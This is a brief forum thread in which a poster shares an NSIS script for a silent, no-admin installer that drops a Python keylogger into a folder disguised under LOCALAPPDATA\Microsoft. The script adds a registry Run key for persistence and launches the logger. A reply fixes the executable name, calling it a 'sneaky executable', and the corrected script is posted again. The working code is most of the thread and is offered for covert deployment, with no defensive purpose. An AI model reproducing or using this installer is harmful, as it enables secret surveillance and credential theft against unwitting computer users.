    Hi all,

just wanted to share: If youre compiling your own keylogger, here is a nsi-script that generates a silent installer (installs to user directory - meaning it does not need admin rights, starts the keylogger and writes to registry autostart):

    OutFile "install.exe"
    SilentInstall silent
    InstallDir "$LOCALAPPDATA\Microsoft\PYKL"
    RequestExecutionLevel user
    SetCompressor lzma
    Section
        SetOutPath "$INSTDIR"
        SetOverwrite try
        File /r ".\dist\*.*"
        WriteRegStr HKCU "Software\Microsoft\Windows\CurrentVersion\Run" "pykeylogger.exe" "$INSTDIR\pykeylogger.exe"
        Exec '"$INSTDIR\amonitor.exe"'
    SectionEnd

  • Thanks!  In the Exec line, if I'm not mistaken then amonitor.exe should be replaced with pykeylogger.exe (or whatever you've called your sneaky executable).

Yes, youre right … so the script should read like:

    OutFile "install.exe"
    SilentInstall silent
    InstallDir "$LOCALAPPDATA\Microsoft\PYKL"
    RequestExecutionLevel user
    SetCompressor lzma
    Section
        SetOutPath "$INSTDIR"
        SetOverwrite try
        File /r ".\dist\*.*"
        WriteRegStr HKCU "Software\Microsoft\Windows\CurrentVersion\Run" "pykeylogger.exe" "$INSTDIR\pykeylogger.exe"
        Exec '"$INSTDIR\pykeylogger.exe"'
    SectionEnd
